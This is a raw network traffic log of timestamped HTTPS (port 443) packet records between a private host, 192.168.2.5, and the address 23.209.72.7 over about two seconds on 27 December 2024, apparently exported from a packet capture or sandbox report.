Dec 27, 2024 07:10:50.146313906 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.162816048 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.173403978 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.177333117 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.177629948 CET	59227	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.196271896 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.219439983 CET	59227	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.221924067 CET	59227	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.428284883 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.460522890 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.471666098 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.479341984 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.479540110 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.479588032 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.479614973 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.479626894 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.480160952 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.480308056 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.480341911 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.480357885 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.480467081 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.480479002 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.480489969 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.480500937 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.480742931 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.480753899 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.480763912 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.480772972 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.480775118 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.480786085 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.480796099 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.480812073 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.486706972 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.500469923 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.500518084 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.500529051 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.500689030 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.500699997 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.500710964 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.500724077 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.500834942 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.500847101 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.500859022 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.500869989 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.500992060 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.506489038 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.506913900 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.506954908 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.507384062 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.508788109 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.508796930 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.508920908 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.509006977 CET	59227	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.509073973 CET	59227	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.513832092 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.514113903 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.514270067 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.514357090 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.514368057 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.514468908 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.514478922 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.519440889 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.519711018 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.519815922 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.519875050 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.519898891 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.519988060 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.519999981 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.520064116 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.520109892 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.520122051 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.520133972 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.520344019 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.520628929 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.520818949 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.542717934 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.546020985 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.546031952 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.546041965 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.546181917 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.546191931 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.546196938 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.546204090 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.546226025 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.546355009 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.546382904 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.546395063 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.547264099 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.547276974 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.547290087 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.547300100 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.547430992 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.547441959 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.547451973 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.547466993 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.547626972 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.547637939 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.547903061 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.550445080 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.550482988 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.550612926 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.550622940 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.550760984 CET	59227	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.550812006 CET	59227	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.558162928 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.558262110 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.558408022 CET	59227	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.564167023 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.564273119 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.564331055 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.564341068 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.564467907 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.564477921 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.564487934 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.564526081 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.564644098 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.564802885 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.564815044 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.564937115 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.566549063 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.566745043 CET	59227	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.572043896 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.572391033 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.572930098 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.574873924 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.575015068 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.575026035 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.575076103 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.575092077 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.575100899 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.575113058 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.575566053 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.575577021 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.575587988 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.576186895 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.588471889 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.588534117 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.588546038 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.588673115 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.588684082 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.588694096 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.588707924 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.588866949 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.588879108 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.588890076 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.589018106 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.607007980 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.607019901 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.607031107 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.607042074 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.607186079 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.607198954 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.630606890 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.830642939 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.858283043 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.893012047 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.931834936 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.946861029 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.948851109 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.949094057 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.949105978 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.950783014 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.950870037 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.950974941 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.951055050 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.951067924 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.951155901 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.951159000 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.951221943 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.951234102 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.951293945 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.951303959 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.951648951 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.951869011 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.952122927 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.952191114 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.952202082 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.952322960 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.952341080 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.952352047 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.952364922 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.952492952 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.952506065 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.952517033 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.953366041 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.971910000 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.971954107 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.971965075 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.972089052 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.972100019 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.972110987 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.972122908 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.972229958 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.972311020 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.972316980 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.972328901 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.972340107 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.972348928 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.984628916 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.984647989 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.984661102 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.985677958 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.993061066 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.997929096 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.997988939 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.998121023 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.998136044 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.998147011 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.000338078 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:51.015922070 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:51.143848896 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:51.304811001 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.316873074 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.323818922 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.323863029 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.324008942 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.324022055 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.324033022 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.324074030 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:51.327869892 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:51.339412928 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.345387936 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.345455885 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.345592022 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.345602036 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.345612049 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.345666885 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:51.386569023 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:51.468122959 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.479635954 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.479696035 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.479907036 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.479974031 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.479995966 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:51.480078936 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.480133057 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.480143070 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.480232954 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.480283022 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.480293989 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.480304956 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.480632067 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:51.499602079 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.499656916 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.499669075 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.499819040 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.499830961 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.499841928 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.499855042 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.500013113 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.500024080 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.500032902 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.500353098 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:51.557687998 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:51.557909966 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:51.651756048 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.657815933 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.657886982 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.657938004 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.657949924 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.657962084 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.657980919 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.659565926 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:51.689224958 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:51.692742109 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.720474958 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:51.778285027 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:51.779464006 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:51.779792070 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:51.827819109 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.881349087 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.881372929 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.886857986 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.887114048 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.887227058 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.887355089 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.887430906 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.887444973 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.887523890 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.887533903 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.891911030 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.892193079 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.892272949 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.892285109 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.892308950 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.892318964 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:51.898272038 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:51.898567915 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:51.926852942 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:51.963593006 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:51.964418888 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:52.006706953 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.044023037 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.049047947 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.049424887 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.049614906 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.049675941 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.049688101 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.049815893 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.049828053 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.049839020 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.049851894 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.050020933 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.050033092 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.062768936 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.062803030 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.062815905 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.062932014 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.062942982 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.070064068 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:52.070517063 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:52.101970911 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:52.102323055 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:52.106528044 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.106542110 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.106549978 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.112107992 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.112356901 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:52.112361908 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.112422943 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.112482071 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.112590075 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.112602949 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.112615108 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.112735033 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.112746954 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.112757921 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.112854004 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.113189936 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:52.127034903 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.127088070 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.127866983 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.128009081 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.128019094 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.128058910 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.128072977 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.128186941 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.128197908 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.128212929 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.128504038 CET	58828	443	192.168.2.5	23.209.72.7
